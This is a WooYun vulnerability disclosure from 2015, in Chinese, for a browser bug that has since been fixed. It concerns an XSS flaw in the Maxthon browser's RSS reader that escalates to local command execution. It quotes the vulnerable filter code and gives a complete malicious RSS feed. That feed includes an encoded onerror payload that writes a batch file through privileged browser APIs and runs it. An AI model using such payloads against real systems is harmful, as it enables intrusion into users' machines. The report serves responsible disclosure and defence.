傲游浏览器RSS订阅处继续XSS导致远程命令执行（有条件）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0114877

漏洞标题：傲游浏览器RSS订阅处继续XSS导致远程命令执行（有条件）

漏洞作者：路人甲

提交时间：2015-05-19 10:49

修复时间：2015-08-18 23:44

公开时间：2015-08-18 23:44

漏洞类型：远程代码执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-19：细节已通知厂商并且等待厂商处理中
2015-05-20：厂商已经确认，细节仅向厂商公开
2015-07-14：细节向核心白帽子及相关领域专家公开
2015-07-24：细节向普通白帽子公开
2015-08-03：细节向实习白帽子公开
2015-08-18：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

看http://www.wooyun.org/bugs/wooyun-2015-0114083，据说4.4.5.1800 中已处理.但是，这么多正则来过滤，难免不会再次出问题。
老是在修XSS，何时是个头。

详细说明：

下载最新的4.4.5.1800，依然存在问题。
问题还是出在 RSS的过滤函数上，如下图所示：

其中 y.baseUrl来自 /rss/channel/link 这个节点。

z = z.replace(/<img ([^>]*?)src\s*=\s*"([^"]+?)"/ig, function(B, A, E, D, C) {
                    return "<img " + A + 'src="' + n(E, y) + '"';
                })

这段代码有什么问题呢？
如果我们恶意构造 z 的内容，即构造/rss/channel/item/description结合，让其含有以下html代码，

<img a=" src="/" />

例如改成下面这样：
<description><![CDATA[<strong>a</strong><img a=" src="/" />]]></description>
根据正则的匹配，此时 A 为 a=" , E 为 src属性的值，即为 /
替换后的内容为
<img a=" src="XXXXXXXXXX "
可以看到，如果XXXXXXXX我们可以控制的话，那么就可以成功XSS。
XXXXXXXX 的值来自于 n(E, y) ，我们来看看 n 函数，

function n(q, r) {
        q = q.trim().replace(/\"/g, "%22");
        if (q.charAt(0) == "/") {
            if (q.charAt(1) == "/") {
                if (!r.protocol) {
                    r.protocol = r.baseUrl.replace(/(^[a-z0-9_.~-]+:).*/i, "$1");
                }
                return r.protocol + q;
            }
            if (!r.baseAbsPath) {
                r.baseAbsPath = r.baseUrl.replace(/(^[a-z0-9_.~-]+:\/\/.*\/).*/i, "$1");
            }
            return r.baseAbsPath + q.substr(1);
        }
        if (/^javascript:/i.test(q)) {
            return "#";
        } else {
            if ((/^[a-z0-9_.~-]+:/i).test(q)) {
                return q;
            }
        }
        if (!r.baseRelPath) {
            r.baseRelPath = r.baseUrl.replace(/(^[a-z0-9_.~-]+:\/\/.*\/(?:[^#?]*\/)?).*/i, "$1");
        }
        return r.baseRelPath + q;
    }

可以看到 n 函数的返回值由 baseUrl 构成，而baseUrl上面说到是来自来自 /rss/channel/link 这个节点。
如此一来，我们只需要把 /rss/channel/link 这个节点的值，恶意构造成XSS代码即可。
<link>/ src=1 onerror=alert(1)//</link>
----------------------------------
综合起来的XML代码如下：

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title>wooyun.org 最新提交漏洞</title>
<link>/ src=1 onerror=alert(1)//</link>
<ttl>5</ttl>
<description>wooyun.org</description>
<language>zh-cn</language>
<generator>www.wooyun.org</generator>
<webmaster>webmaster@wooyun.org</webmaster>
<item>
<link> WooYun: 苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞 </link>
<title><![CDATA[苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞]]></title>
<description><![CDATA[<strong>a</strong><img a=" src="/" />]]></description>
<pubDate>Wed, 05 Nov 2014 15:38:18 +0800</pubDate>
<category></category>
<author>路人甲</author>
<guid> WooYun: 苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞 </guid>
</item>
</channel>
</rss>

XSS成功执行：

至于命令执行，只需要把link部分稍微做改动即可：

<link>/ src=1 onerror=eval(unescape(/var%20s%3Ddocument.createElement%28%22iframe%22%29%3Bs.onload%3Dfunction%28%29%7Bvar%20io%3Ds.contentWindow.maxthon.io%3Bvar%20f%3Dnew%20io.File.createTempFile%28%29%3Bf.name_%3D%22C%3A%5C%5C1.bat%22%3Bio.FileWriter%28f%29%3Bio.writeText%28%22net%20user%20%26%26%20pause%22%29%3Bs.onload%3Dfunction%28%29%7Bs.contentWindow.maxthon.program.Program.launch%28%22C%3A%5C%5C1.bat%22%2C%22%22%29%7D%3Bs.src%3D%22mx%3A%2f%2fres%2fnotification%2f%22%7D%3Bs.src%3D%22mx%3A%2f%2fres%2fapp%2f%257B33CA60D6-EADC-4558-9185-2EBE14214AB9%257D%2findex.htm%22%3Bdocument.body.appendChild%28s%29%3B/.source))//</link>

漏洞证明：

见：http://appmaker.sinaapp.com/mxpoc-2015-5-19.xml

修复方案：

1. 继续修正则，
2. 但是如果这样继续修，太容易继续被X了。是否考虑其它方式来避免此类问题？

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2015-05-20 23:43

厂商回复：

内核已限制 RSS 中调用exe及写入本地文件
下一步继续完善过滤

漏洞评价：

2015-05-19 11:01 | 梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

然而4.4.5.1800的版本并没有放出来
2015-05-19 11:04 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

@梧桐雨干嘛还要匿名。。
2015-05-19 11:24 | 梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

@px1624 不是我发的。
2015-05-24 15:30 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

是二哥吧

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0114877

漏洞标题：傲游浏览器RSS订阅处继续XSS导致远程命令执行（有条件）

相关厂商：傲游

漏洞作者：路人甲

提交时间：2015-05-19 10:49

修复时间：2015-08-18 23:44

公开时间：2015-08-18 23:44

漏洞类型：远程代码执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0114877

漏洞标题：傲游浏览器RSS订阅处继续XSS导致远程命令执行（有条件）

相关厂商：傲游

漏洞作者： 路人甲

提交时间：2015-05-19 10:49

修复时间：2015-08-18 23:44

公开时间：2015-08-18 23:44

漏洞类型：远程代码执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0114877"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云